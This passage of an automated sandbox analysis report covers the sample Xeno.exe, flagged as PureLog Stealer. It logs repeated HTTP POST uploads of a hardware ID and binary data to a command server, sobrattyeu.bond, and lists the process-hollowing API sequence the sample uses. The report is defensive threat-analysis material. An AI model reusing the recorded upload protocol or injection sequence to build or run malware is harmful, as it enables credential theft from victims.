                          2025-01-15 15:16:11 UTC  2788  OUT  Data Raw: 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c
                          Data Ascii: f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                          2025-01-15 15:16:23 UTC  1129  IN  HTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=bkpv6kfohogae572fsvpc1vdi4; expires=Sun, 11 May 2025 09:03:01 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jw7cZeKriIiu4mIZ8o6weCN8vUL9l4suOuHx3H%2BdCKlrGRAwDWvauu%2B7ksR9pDlUjOfIGv86H8HipuPnGhfF0SOeL78t3eKj7bxhkn6nDIixWjEJ9%2FYbzTeZyodtvUQoxZ8%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3523ab5de9a-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1468&min_rtt=1465&rtt_var=556&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=19072&delivery_rate=1958417&cwnd=194&unsent_bytes=0&cid=656ed4bc6531c0d1&ts=12500&x=0"
                          2025-01-15 15:16:23 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                          Data Ascii: fok 8.46.123.189
                          2025-01-15 15:16:23 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                          3  192.168.2.4  49746  104.21.96.1  443  3020  C:\Users\user\Desktop\Xeno.exe
                          Timestamp  Bytes transferred  Direction  Data
                          2025-01-15 15:16:24 UTC  280  OUT  POST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: multipart/form-data; boundary=XVKS6T05H4JF1683U6
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 8788
                          Host: sobrattyeu.bond
                          2025-01-15 15:16:24 UTC  8788  OUT  Data Raw: 2d 2d 58 56 4b 53 36 54 30 35 48 34 4a 46 31 36 38 33 55 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 44 44 31 34 31 32 32 30 33 33 44 44 32 42 43 36 31 42 41 33 42 41 44 38 38 36 32 42 36 32 0d 0a 2d 2d 58 56 4b 53 36 54 30 35 48 34 4a 46 31 36 38 33 55 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 56 4b 53 36 54 30 35 48 34 4a 46 31 36 38 33 55 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31
                          Data Ascii: --XVKS6T05H4JF1683U6Content-Disposition: form-data; name="hwid"48DD14122033DD2BC61BA3BAD8862B62--XVKS6T05H4JF1683U6Content-Disposition: form-data; name="pid"2--XVKS6T05H4JF1683U6Content-Disposition: form-data; name="lid"yau6Na--91451
                          2025-01-15 15:16:24 UTC  1123  IN  HTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=f2jdn5ljeg5l8fgvs93t4e7dml; expires=Sun, 11 May 2025 09:03:03 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KQLqghnl32Uac%2FhOkAX3MV5xLgJgpAcZX4SbpU0CQiDgQOBN5Lx6RHTBWLz4z4ryMKXWdVipp9u5pwYStRfShTGJm%2BnhtSqI4ABNGWle4OGZloSXSeA9hfAzUxbURCa5UtU%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3a3583ac32e-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1532&min_rtt=1511&rtt_var=610&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9726&delivery_rate=1732937&cwnd=178&unsent_bytes=0&cid=25fa0087d3385d00&ts=827&x=0"
                          2025-01-15 15:16:24 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                          Data Ascii: fok 8.46.123.189
                          2025-01-15 15:16:24 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                          4  192.168.2.4  49747  104.21.96.1  443  3020  C:\Users\user\Desktop\Xeno.exe
                          Timestamp  Bytes transferred  Direction  Data
                          2025-01-15 15:16:25 UTC  273  OUT  POST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: multipart/form-data; boundary=WLMONHV8TN
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 20393
                          Host: sobrattyeu.bond
                          2025-01-15 15:16:25 UTC  15331  OUT  Data Raw: 2d 2d 57 4c 4d 4f 4e 48 56 38 54 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 44 44 31 34 31 32 32 30 33 33 44 44 32 42 43 36 31 42 41 33 42 41 44 38 38 36 32 42 36 32 0d 0a 2d 2d 57 4c 4d 4f 4e 48 56 38 54 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 4c 4d 4f 4e 48 56 38 54 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 0d 0a 2d 2d 57 4c 4d 4f 4e 48 56 38 54 4e 0d 0a 43 6f 6e 74
                          Data Ascii: --WLMONHV8TNContent-Disposition: form-data; name="hwid"48DD14122033DD2BC61BA3BAD8862B62--WLMONHV8TNContent-Disposition: form-data; name="pid"3--WLMONHV8TNContent-Disposition: form-data; name="lid"yau6Na--914510980--WLMONHV8TNCont
                          2025-01-15 15:16:25 UTC  5062  OUT  Data Raw: 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1
                          Data Ascii: lrQMn 64F6(X&7~`aO@
                          2025-01-15 15:16:26 UTC  1129  IN  HTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=9d8gciemfv3oo4ji5t9s5fue9c; expires=Sun, 11 May 2025 09:03:04 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PF%2BiCL7D5z2wf69mFVbiKy1b66FeH%2FWUKvCaMRIVZYfc1GlBSlwoP43wf5avAVCw90FtyOpz3kcQh11BGoDu8ynueO0fi689cbfH%2FD9%2BxavkE6lnMHSPAWNbb8qShdnNpVo%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3abfe431a48-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2016&rtt_var=763&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21346&delivery_rate=1428571&cwnd=157&unsent_bytes=0&cid=1792f5bc75d41415&ts=650&x=0"
                          Timestamp:2025-01-15 15:16:26 UTC  Bytes transferred:20  Direction:IN  Data Ascii:f (chunk size) followed by ok 8.46.123.189 (hex dump omitted)
                          Timestamp:2025-01-15 15:16:26 UTC  Bytes transferred:5  Direction:IN  Data Ascii:0 (terminating chunk; hex dump omitted)


                          Session ID:5
                          Source IP:192.168.2.4
                          Source Port:49748
                          Destination IP:104.21.96.1
                          Destination Port:443
                          PID:3020
                          Process:C:\Users\user\Desktop\Xeno.exe
                          Timestamp:2025-01-15 15:16:26 UTC  Bytes transferred:276  Direction:OUT  Data:POST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: multipart/form-data; boundary=WWDJ5BXJR9T6I9
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 1391
                          Host: sobrattyeu.bond
                          Timestamp:2025-01-15 15:16:26 UTC  Bytes transferred:1391  Direction:OUT  Data Ascii (hex dump omitted, CRLF line breaks restored):
                          --WWDJ5BXJR9T6I9
                          Content-Disposition: form-data; name="hwid"

                          48DD14122033DD2BC61BA3BAD8862B62
                          --WWDJ5BXJR9T6I9
                          Content-Disposition: form-data; name="pid"

                          1
                          --WWDJ5BXJR9T6I9
                          Content-Disposition: form-data; name="lid"

                          yau6Na--914510980
                          --WWDJ
                          Timestamp:2025-01-15 15:16:27 UTC  Bytes transferred:1124  Direction:IN  Data:HTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=fau0edsenfe0gqftrpmmiqe5lj; expires=Sun, 11 May 2025 09:03:06 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVk4xzJm%2FC1ZmHbXl0TJbsgtjonv0Y855K%2ByVoZ1sZcoYrWLmdxmJ5FYYcM65UMBY5VH7oCLQuTwxqKXcIkySC7KHBGCcHQM6VUi01EH3rxK5%2BV25fK0MxnQVlQHfWcjBmw%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3b3bd2b4363-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1914&min_rtt=1643&rtt_var=810&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2303&delivery_rate=1777236&cwnd=240&unsent_bytes=0&cid=1098b262a0057f00&ts=749&x=0"
                          Timestamp:2025-01-15 15:16:27 UTC  Bytes transferred:20  Direction:IN  Data Ascii:f (chunk size) followed by ok 8.46.123.189 (hex dump omitted)
                          Timestamp:2025-01-15 15:16:27 UTC  Bytes transferred:5  Direction:IN  Data Ascii:0 (terminating chunk; hex dump omitted)


                          Session ID:6
                          Source IP:192.168.2.4
                          Source Port:49749
                          Destination IP:104.21.96.1
                          Destination Port:443
                          PID:3020
                          Process:C:\Users\user\Desktop\Xeno.exe
                          Timestamp:2025-01-15 15:16:28 UTC  Bytes transferred:276  Direction:OUT  Data:POST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: multipart/form-data; boundary=RFRJMFWTEQN7
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 568321
                          Host: sobrattyeu.bond
                          Timestamp:2025-01-15 15:16:28 UTC  Bytes transferred:15331  Direction:OUT  Data Ascii (hex dump omitted, CRLF line breaks restored):
                          --RFRJMFWTEQN7
                          Content-Disposition: form-data; name="hwid"

                          48DD14122033DD2BC61BA3BAD8862B62
                          --RFRJMFWTEQN7
                          Content-Disposition: form-data; name="pid"

                          1
                          --RFRJMFWTEQN7
                          Content-Disposition: form-data; name="lid"

                          yau6Na--914510980
                          --RFRJMFWTEQ
                          Timestamp:2025-01-15 15:16:28 UTC  Bytes transferred:15331 (nine further chunks)  Direction:OUT  Data:non-printable binary payload continuing the multipart upload (hex and ASCII dumps omitted)
                          Timestamp:2025-01-15 15:16:33 UTC  Bytes transferred:1137  Direction:IN  Data:HTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=varqjrh32uc08dbb2frru12ji2; expires=Sun, 11 May 2025 09:03:08 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SJ%2BI87NC3%2FqOAR3xu2SuKevGMxsi6mQpAQeTkDsP2G2Cq5%2FuJbn%2Fuu9wMkaExlb0HK8vklcU4kRtgUG7Pt7tNPt6WGFhpQWGbYFt8qkUScpXrcWNa2HAElkCbwS%2FXjA%2BMzE%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3beca5072a4-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=1994&rtt_var=757&sent=201&recv=589&lost=0&retrans=0&sent_bytes=2836&recv_bytes=570861&delivery_rate=1464393&cwnd=212&unsent_bytes=0&cid=a733e151f9eac5c5&ts=5306&x=0"


                          Session ID:7
                          Source IP:192.168.2.4
                          Source Port:49750
                          Destination IP:104.21.96.1
                          Destination Port:443
                          PID:3020
                          Process:C:\Users\user\Desktop\Xeno.exe
                          Timestamp:2025-01-15 15:16:34 UTC  Bytes transferred:263  Direction:OUT  Data:POST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 86
                          Host: sobrattyeu.bond
                          Timestamp:2025-01-15 15:16:34 UTC  Bytes transferred:86  Direction:OUT  Data Ascii (hex dump omitted):act=get_message&ver=4.0&lid=yau6Na--914510980&j=&hwid=48DD14122033DD2BC61BA3BAD8862B62
                          Timestamp:2025-01-15 15:16:34 UTC  Bytes transferred:1124  Direction:IN  Data:HTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=a8m0q7dl90pmjb2v8lotmi0in2; expires=Sun, 11 May 2025 09:03:13 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dXfffPP0zTwe0iGBL3fzPBCHFrou2QD%2F6lgpwigkUZyoQfBEeubyeo1gOePK9ZMcCZ%2F1RTtqVL2JZ1KlScy4AdOpOecS02%2BZpgzailFiW00lcm%2BhJ0UFqAdzaJwpVg1I6U%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3e33eab42c0-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4212&recv_bytes=985&delivery_rate=303439&cwnd=212&unsent_bytes=0&cid=700602c31f8e8db3&ts=520&x=0"
                          Timestamp:2025-01-15 15:16:34 UTC  Direction:IN  Data:chunked response body (chunks of 245, 912 and seven of 1369 bytes captured; printable base64-like text, hex and ASCII dumps omitted)


                          Target ID:0
                          Start time:10:16:06
                          Start date:15/01/2025
                          Path:C:\Users\user\Desktop\Xeno.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Xeno.exe"
                          Imagebase:0xb90000
                          File size:455'792 bytes
                          MD5 hash:1E5F4EE4303AA49C9C32E89132C7B4F9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1685351915.0000000000B92000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:10:16:06
                          Start date:15/01/2025
                          Path:C:\Users\user\Desktop\Xeno.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Xeno.exe"
                          Imagebase:0x770000
                          File size:455'792 bytes
                          MD5 hash:1E5F4EE4303AA49C9C32E89132C7B4F9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:4
                          Start time:10:16:06
                          Start date:15/01/2025
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 924
                          Imagebase:0xae0000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true


                            Execution Graph

                            Execution Coverage:14.2%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:21.9%
                            Total number of Nodes:32
                            Total number of Limit Nodes:3
                            Execution graph (rendered graph data, not reproduced). Recoverable structure: entry 2f980be → 2f980d8 calls CreateProcessW, VirtualAlloc, Wow64GetThreadContext, ReadProcessMemory and VirtualAllocEx (with a side branch to 2f98087 GetPEB) → 2f9817f WriteProcessMemory → a loop at 2f981c4/2f981c9 WriteProcessMemory → 2f98206 WriteProcessMemory, Wow64SetThreadContext, ResumeThread. A second component rooted at 1230b88 passes through 1230ac0, 12327c8, 1232880 and 1232104 and ends in VirtualProtect (1232b1b, 1232ad0).

                            Control-flow Graph

                            APIs
                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F97EB3,02F97EA3), ref: 02F980D9
                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02F980EC
                            • Wow64GetThreadContext.KERNEL32(000000D4,00000000), ref: 02F9810A
                            • ReadProcessMemory.KERNELBASE(00000368,?,02F97EF7,00000004,00000000), ref: 02F9812E
                            • VirtualAllocEx.KERNELBASE(00000368,?,?,00003000,00000040), ref: 02F98159
                            • WriteProcessMemory.KERNELBASE(00000368,00000000,?,?,00000000,?), ref: 02F981B1
                            • WriteProcessMemory.KERNELBASE(00000368,00400000,?,?,00000000,?,00000028), ref: 02F981FC
                            • WriteProcessMemory.KERNELBASE(00000368,?,?,00000004,00000000), ref: 02F9823A
                            • Wow64SetThreadContext.KERNEL32(000000D4,05420000), ref: 02F98276
                            • ResumeThread.KERNELBASE(000000D4), ref: 02F98285
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1847615635.0000000002F97000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F97000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2f97000_Xeno.jbxd
                            Similarity
                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                            • String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                            • API String ID: 2687962208-232383841
                            • Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                            • Instruction ID: a06400a0cc72d8ced2af2b4d31d49f2cb7c0277a706cb220a6d985f1d1a78235
                            • Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                            • Instruction Fuzzy Hash: B8B1077660064AAFDB60CF68CC80BDAB3A5FF88754F158524EA0CAB341D774FA51CB94

                            Control-flow Graph

                            APIs
                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F97EB3,02F97EA3), ref: 02F980D9
                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02F980EC
                            • Wow64GetThreadContext.KERNEL32(000000D4,00000000), ref: 02F9810A
                            • ReadProcessMemory.KERNELBASE(00000368,?,02F97EF7,00000004,00000000), ref: 02F9812E
                            • VirtualAllocEx.KERNELBASE(00000368,?,?,00003000,00000040), ref: 02F98159
                            • WriteProcessMemory.KERNELBASE(00000368,00000000,?,?,00000000,?), ref: 02F981B1
                            • WriteProcessMemory.KERNELBASE(00000368,00400000,?,?,00000000,?,00000028), ref: 02F981FC
                            • WriteProcessMemory.KERNELBASE(00000368,?,?,00000004,00000000), ref: 02F9823A
                            • Wow64SetThreadContext.KERNEL32(000000D4,05420000), ref: 02F98276
                            • ResumeThread.KERNELBASE(000000D4), ref: 02F98285
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1847615635.0000000002F97000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F97000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2f97000_Xeno.jbxd
                            Similarity
                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                            • String ID: TerminateProcess
                            • API String ID: 2687962208-2873147277
                            • Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                            • Instruction ID: d443cfc02ea76a1cb132c8e11901e369be1e1441e32d671285fe027a44f1a313
                            • Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                            • Instruction Fuzzy Hash: DA312D72340646ABEB34CF54CC91FEA7365BFC8B55F148508EB09AF280C6B4BA058B94

                            Control-flow Graph

                            Control-flow graph of 1232880-1232b71 (rendered graph data, not reproduced): 46 basic blocks; the only API call, VirtualProtect, sits in block 1232ab4-1232b56, which most of the other blocks branch to directly.
                            Memory Dump Source
                            • Source File: 00000000.00000002.1846566171.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1230000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 43cdd4c1440f795780423a7f42d42dd52cf31de1b6da795ef2df546c6fe1f5fd
                            • Instruction ID: db71740351598e4b3829e13a77485b1e54ed804801c70ca2b634950664fa4072
                            • Opcode Fuzzy Hash: 43cdd4c1440f795780423a7f42d42dd52cf31de1b6da795ef2df546c6fe1f5fd
                            • Instruction Fuzzy Hash: 33A12AB1910259DFCB15CFA9D480AEDFBF1BF88314F28C659E459A7312C330A881CBA4

                            Control-flow Graph

                            Control-flow graph of 1232104-1232b71 (rendered graph data, not reproduced): 3 basic blocks; VirtualProtect is called in block 1232104-1232b56.
                            APIs
                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01232B49
                            Memory Dump Source
                            • Source File: 00000000.00000002.1846566171.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1230000_Xeno.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: f47cd7405952a5c3f3747e4c75f77d8818d5dd29e5e0866498ce96032633929d
                            • Instruction ID: 5c3e54b6dca9a98df98d7386868d7b304a431ea8309847b0e589fa7db74264e2
                            • Opcode Fuzzy Hash: f47cd7405952a5c3f3747e4c75f77d8818d5dd29e5e0866498ce96032633929d
                            • Instruction Fuzzy Hash: 3221E0B5910619EFCB00DF9AD884ADEFBB4FB49314F10812AE918A7200D374A954CFA5

                            Execution Graph

                            Execution Coverage:8.3%
                            Dynamic/Decrypted Code Coverage:5.7%
                            Signature Coverage:66.4%
                            Total number of Nodes:298
                            Total number of Limit Nodes:16
